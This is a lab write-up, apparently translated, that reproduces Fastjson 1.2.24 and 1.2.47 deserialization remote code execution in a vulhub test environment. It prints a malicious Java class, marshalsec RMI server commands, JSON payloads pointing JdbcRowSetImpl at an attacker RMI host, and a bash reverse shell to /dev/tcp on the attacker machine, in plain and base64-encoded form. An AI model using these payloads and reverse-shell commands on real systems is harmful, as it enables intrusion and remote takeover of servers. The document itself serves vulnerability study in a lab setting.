Fastjson 1.2.24 deserialization vulnerability reappears
1. Vulnerability introduction
FastjsonEngine is one of the JSON processing engines. Fastjson is one of the Java-based JSON parsers/generators. There is a security vulnerability in the parseObject version of Fastjson before 1.2.25 used by FastjsonEngine in Pippo version 1.11.0. When using fastjson autotype to process json objects, the security of the @type field is not verified. An attacker can pass in a dangerous class and call the dangerous class to connect to the remote RMI host, and execute code through the malicious class to affect the version.
Vulnerability affected versions
Fastjson<1.2.25
Vulnerability exploitation principle:
sends a malicious json format payload in the request package. When processing the json object, the vulnerability does not filter the @type field, which allows the attacker to pass in the malicious TemplatesImpl class, and this class has a The field is _bytecodes
. Some functions will generate java instances based on this _bytecodes
. This allows fastjson to pass in a class through the field, and then execute it when the class is generated. Constructor.
2. Vulnerability environment construction
UbuntuKōroki ip: 192.168.241.129
Kail kail ip: 192.168.241.128
vulhub enters /vulhub-master/fistjion/1.2.24-rce
Use command:
docker-compose up -d
Visit: ip+8090
http://192.168.241.129:8090
After the environment is running, visithttp://your-ip:8090
to see the output in JSON format
3. Vulnerability recurrence
1. First compile and upload the command execution code, TouchFile.java
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {
"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
Save the above code as TouchFile.java and execute it in the current directory
javac TouchFile.java
After execution, a TouchFile.class file will be generated.
2. Use the Java deserialization tool marshalsec to assist in opening the RMI environment
git clone https://github.com/mbechler/marshalsec
After downloading, enter the directory and use cmd, and use the following command to compile
mvn clean package -DskipTests //使用mvn命令前需要确认maven安装
With the help of the marshalsec project, start an RMI server, listen on the port, and specify the remote class TouchFile.class to load and execute
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.241.128:4444/#TouchFile" 9999
3. In the directory where the compiled class file is located, use python to enable monitoring.
python -m SimpleHTTPServer 4444
SimpleHTTPServer is a module that comes with Python 2 and is a Python web server. In Python 3 it has been merged into the http.server module. If you do not specify a port number, the default is port 8000. Just use the web in the LAN to access http:/IP:8000
python2语法:python -m SimpleHTTPServer
python3语法:python -m http.server
4. Send payload and rebound shell
Send the Payload to the shooting range server with the RMI address:
POST / HTTP/1.1
Host: 192.168.241.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.241.128:9999/TouchFile",
"autoCommit":true
}
}
5. Check the rebound shell and enter the target machine to check whether the command is executed successfully.
You can see the monitoring information and the connection has been established.
Enter the drone
View container id
docker ps
Execute the following command to check whether the remote command is executed:
docker exec -it 9ec77798e0bf /bin/bash
You can see that the execution was successful,
If you want to change the execution command, just change the following command in Touch.java:
String[] commands = {"touch", "/tmp/success"};
4.fastjson 1.2.47 deserialization vulnerability reappears
1.Normal recurrence
The basic steps are the same as above
The poc is as follows:
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://192.168.241.128:9999/Exploit",
"autoCommit": true
}
}
2. Use tools to reproduce
download link:
https://github.com/zhzyker/exphub
fastjson_tool.jar
fastjson-1.2.47_rce.py
Host B starts the RMI service and loads the remote malicious java class.
bash -i >& /dev/tcp/192.168.241.128/6666 0>&1 //需要base64编码
java -cp fastjson_tool.jar fastjson.HRMIServer 192.168.241.128 9998 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNjY2NiAwPiYx==}|{base64,-d}|{bash,-i}"
Start nc to listen on port 6666
nc -lnvp 6666
Send a malicious java class that exploits the fastjson deserialization vulnerability to cause the target machine to execute RMI services to execute remote commands.
python3 fastjson-1.2.47_rce.py http://192.168.241.129:8090 rmi://192.168.241.128:9998/Object
However, there is no rebound shell